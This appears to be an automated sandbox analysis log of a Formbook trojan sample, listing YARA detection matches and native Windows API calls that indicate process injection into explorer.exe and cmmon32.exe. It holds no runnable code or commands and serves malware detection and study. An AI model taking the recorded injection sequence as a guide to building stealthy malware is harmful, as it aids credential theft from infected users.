          Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: VFylJFPzqX.exe PID: 7764, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: AddInProcess32.exe PID: 7984, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: cmmon32.exe PID: 8104, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041A330 NtCreateFile,3_2_0041A330
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041A3E0 NtReadFile,3_2_0041A3E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041A460 NtClose,3_2_0041A460
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041A510 NtAllocateVirtualMemory,3_2_0041A510
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041A32A NtCreateFile,3_2_0041A32A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041A3DA NtReadFile,3_2_0041A3DA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041A45A NtClose,3_2_0041A45A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041A50A NtAllocateVirtualMemory,3_2_0041A50A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_01802BF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802B60 NtClose,LdrInitializeThunk,3_2_01802B60
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802AD0 NtReadFile,LdrInitializeThunk,3_2_01802AD0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802DD0 NtDelayExecution,LdrInitializeThunk,3_2_01802DD0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01802DF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802D10 NtMapViewOfSection,LdrInitializeThunk,3_2_01802D10
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_01802D30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_01802CA0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01802C70
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802F90 NtProtectVirtualMemory,LdrInitializeThunk,3_2_01802F90
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802FB0 NtResumeThread,LdrInitializeThunk,3_2_01802FB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802FE0 NtCreateFile,LdrInitializeThunk,3_2_01802FE0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802F30 NtCreateSection,LdrInitializeThunk,3_2_01802F30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_01802E80
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_01802EA0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01804340 NtSetContextThread,3_2_01804340
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01804650 NtSuspendThread,3_2_01804650
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802B80 NtQueryInformationFile,3_2_01802B80
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802BA0 NtEnumerateValueKey,3_2_01802BA0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802BE0 NtQueryValueKey,3_2_01802BE0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802AB0 NtWaitForSingleObject,3_2_01802AB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802AF0 NtWriteFile,3_2_01802AF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802DB0 NtEnumerateKey,3_2_01802DB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802D00 NtSetInformationFile,3_2_01802D00
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802CC0 NtQueryVirtualMemory,3_2_01802CC0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802CF0 NtOpenProcess,3_2_01802CF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802C00 NtQueryInformationProcess,3_2_01802C00
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802C60 NtCreateKey,3_2_01802C60
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802FA0 NtQuerySection,3_2_01802FA0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802F60 NtCreateProcessEx,3_2_01802F60
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802EE0 NtQueueApcThread,3_2_01802EE0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802E30 NtWriteVirtualMemory,3_2_01802E30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01803090 NtSetValueKey,3_2_01803090
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01803010 NtOpenDirectoryObject,3_2_01803010
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018035C0 NtCreateMutant,3_2_018035C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018039B0 NtGetContextThread,3_2_018039B0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01803D10 NtOpenProcessToken,3_2_01803D10
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01803D70 NtOpenThread,3_2_01803D70
          Source: C:\Windows\explorer.exeCode function: 4_2_10F75232 NtCreateFile,4_2_10F75232
          Source: C:\Windows\explorer.exeCode function: 4_2_10F76E12 NtProtectVirtualMemory,4_2_10F76E12
          Source: C:\Windows\explorer.exeCode function: 4_2_10F76E0A NtProtectVirtualMemory,4_2_10F76E0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_043C2C70
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2C60 NtCreateKey,LdrInitializeThunk,5_2_043C2C60
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_043C2CA0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_043C2D10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_043C2DF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2DD0 NtDelayExecution,LdrInitializeThunk,5_2_043C2DD0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_043C2EA0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2F30 NtCreateSection,LdrInitializeThunk,5_2_043C2F30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2FE0 NtCreateFile,LdrInitializeThunk,5_2_043C2FE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2AD0 NtReadFile,LdrInitializeThunk,5_2_043C2AD0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2B60 NtClose,LdrInitializeThunk,5_2_043C2B60
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_043C2BF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_043C2BE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C35C0 NtCreateMutant,LdrInitializeThunk,5_2_043C35C0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C4650 NtSuspendThread,5_2_043C4650
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C4340 NtSetContextThread,5_2_043C4340
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2C00 NtQueryInformationProcess,5_2_043C2C00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2CF0 NtOpenProcess,5_2_043C2CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2CC0 NtQueryVirtualMemory,5_2_043C2CC0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2D30 NtUnmapViewOfSection,5_2_043C2D30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2D00 NtSetInformationFile,5_2_043C2D00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2DB0 NtEnumerateKey,5_2_043C2DB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2E30 NtWriteVirtualMemory,5_2_043C2E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2E80 NtReadVirtualMemory,5_2_043C2E80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2EE0 NtQueueApcThread,5_2_043C2EE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2F60 NtCreateProcessEx,5_2_043C2F60
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2FB0 NtResumeThread,5_2_043C2FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2FA0 NtQuerySection,5_2_043C2FA0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2F90 NtProtectVirtualMemory,5_2_043C2F90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2AB0 NtWaitForSingleObject,5_2_043C2AB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2AF0 NtWriteFile,5_2_043C2AF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2BA0 NtEnumerateValueKey,5_2_043C2BA0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C2B80 NtQueryInformationFile,5_2_043C2B80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C3010 NtOpenDirectoryObject,5_2_043C3010
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C3090 NtSetValueKey,5_2_043C3090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C3D10 NtOpenProcessToken,5_2_043C3D10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C3D70 NtOpenThread,5_2_043C3D70
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043C39B0 NtGetContextThread,5_2_043C39B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_024AA330 NtCreateFile,5_2_024AA330
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_024AA3E0 NtReadFile,5_2_024AA3E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_024AA460 NtClose,5_2_024AA460
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_024AA510 NtAllocateVirtualMemory,5_2_024AA510
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_024AA32A NtCreateFile,5_2_024AA32A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_024AA3DA NtReadFile,5_2_024AA3DA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_024AA45A NtClose,5_2_024AA45A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_024AA50A NtAllocateVirtualMemory,5_2_024AA50A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_041FA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,5_2_041FA036
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_041F9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,5_2_041F9BAF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_041FA042 NtQueryInformationProcess,5_2_041FA042
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_041F9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_041F9BB2
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A21A418 CreateProcessAsUserW,0_2_0A21A418
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_00C3C6B80_2_00C3C6B8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_00C389A80_2_00C389A8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_00C36A380_2_00C36A38
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_00C370E80_2_00C370E8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_00C3C6A80_2_00C3C6A8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_00C3BDE00_2_00C3BDE0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_056216B80_2_056216B8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_056211A80_2_056211A8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05623E680_2_05623E68
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_056216A90_2_056216A9
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_056211980_2_05621198
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0562DC2C0_2_0562DC2C
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05623E590_2_05623E59
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05A200070_2_05A20007
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05A200400_2_05A20040
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E54E400_2_05E54E40
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E5ED280_2_05E5ED28
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E54E300_2_05E54E30
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7CCC00_2_05E7CCC0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E76C480_2_05E76C48
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E706E00_2_05E706E0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7DDA80_2_05E7DDA8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7DD980_2_05E7DD98
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7C5450_2_05E7C545
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7C55A0_2_05E7C55A
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7CCB00_2_05E7CCB0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7CC700_2_05E7CC70
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E76C380_2_05E76C38
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7F4000_2_05E7F400
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7EF680_2_05E7EF68
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7EF590_2_05E7EF59
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E787290_2_05E78729
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E787380_2_05E78738
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7E6CC0_2_05E7E6CC
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7C6A40_2_05E7C6A4
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7C6B90_2_05E7C6B9
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E776600_2_05E77660
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E776700_2_05E77670
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7A6400_2_05E7A640
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7A6500_2_05E7A650
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7C6000_2_05E7C600
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7C6150_2_05E7C615
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E781C00_2_05E781C0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7F1A00_2_05E7F1A0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E781B30_2_05E781B3
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7F1900_2_05E7F190
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E770C80_2_05E770C8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7A0A00_2_05E7A0A0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7A0900_2_05E7A090
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7F3F00_2_05E7F3F0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7C2400_2_05E7C240
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7C2310_2_05E7C231
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C33000_2_073C3300
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073CE3A80_2_073CE3A8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073CA5580_2_073CA558
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C79F00_2_073C79F0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073CC1E80_2_073CC1E8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C2C750_2_073C2C75
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C3C400_2_073C3C40
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C48980_2_073C4898
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C94D80_2_073C94D8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C5B280_2_073C5B28
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C5B180_2_073C5B18
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C7BF80_2_073C7BF8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C7BE90_2_073C7BE9
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C99180_2_073C9918
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C99080_2_073C9908
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C3C3B0_2_073C3C3B
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C48710_2_073C4871
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C94C80_2_073C94C8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A214E280_2_0A214E28
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A2156D20_2_0A2156D2
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A210BA00_2_0A210BA0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A2153B80_2_0A2153B8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A214BF00_2_0A214BF0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A2100400_2_0A210040
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A214C480_2_0A214C48
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A2134E80_2_0A2134E8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A21A9500_2_0A21A950
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A213E200_2_0A213E20
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A213E080_2_0A213E08
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A214E190_2_0A214E19
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A217AB00_2_0A217AB0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A2156910_2_0A215691
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A210B710_2_0A210B71
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A21E7500_2_0A21E750
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A2137880_2_0A213788
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A21F7D80_2_0A21F7D8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A214C390_2_0A214C39
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A21E4380_2_0A21E438
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A21003E0_2_0A21003E
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A2144700_2_0A214470
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A2134D70_2_0A2134D7
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A2181080_2_0A218108
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041D8563_2_0041D856
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041E8F73_2_0041E8F7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041E0B43_2_0041E0B4
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_004012093_2_00401209
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041DAC33_2_0041DAC3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041E3C03_2_0041E3C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041EC183_2_0041EC18
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041DD443_2_0041DD44
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041E5CB3_2_0041E5CB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_00402D8A3_2_00402D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_00409E603_2_00409E60
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_00409E1A3_2_00409E1A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041DEB03_2_0041DEB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041DF943_2_0041DF94
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018901AA3_2_018901AA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018841A23_2_018841A2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018881CC3_2_018881CC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C01003_2_017C0100
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186A1183_2_0186A118
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018581583_2_01858158
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018620003_2_01862000
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018903E63_2_018903E6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017DE3F03_2_017DE3F0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188A3523_2_0188A352
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018502C03_2_018502C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018702743_2_01870274
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018905913_2_01890591
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D05353_2_017D0535
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0187E4F63_2_0187E4F6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018744203_2_01874420
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018824463_2_01882446
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D07703_2_017D0770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F47503_2_017F4750
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CC7C03_2_017CC7C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EC6E03_2_017EC6E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E69623_2_017E6962
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0189A9A63_2_0189A9A6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D29A03_2_017D29A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D28403_2_017D2840
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017DA8403_2_017DA840
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FE8F03_2_017FE8F0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017B68B83_2_017B68B8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01886BD73_2_01886BD7
